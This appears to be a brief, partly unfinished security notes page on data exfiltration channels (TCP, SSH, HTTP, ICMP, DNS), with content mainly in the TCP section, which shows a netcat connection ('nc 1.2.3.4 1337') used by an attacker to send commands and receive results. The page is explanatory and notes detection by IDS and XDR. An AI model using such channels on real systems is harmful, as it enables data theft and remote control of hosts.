Page cover

☣️Data Exfiltration

Data exfil via TCP

Example of data transfer via TCP socket
  1. The first machine is listening over TCP on port 1337

  2. The other machine connects to the port specified in step 1. For example, nc 1.2.3.4 1337

  3. The first machine establishes the connection

  4. Finally, the sending and receiving data starts. For example, the attacker sends commands and receives results.

This is easy to detect for IDS and network sniffers, as well as XDR.

Data exfil via SSH

Data exfil via SSH

Data exfil via HTTP

Data exfil via ICMP

The HOST1 sends an ICMP packet with an echo-request packet. Then, if HOST2 is available, it sends an ICMP packet back with an echo reply message confirming the availability.

Data exfil via DNS and DNS Tunneling

--placeholder--

Last updated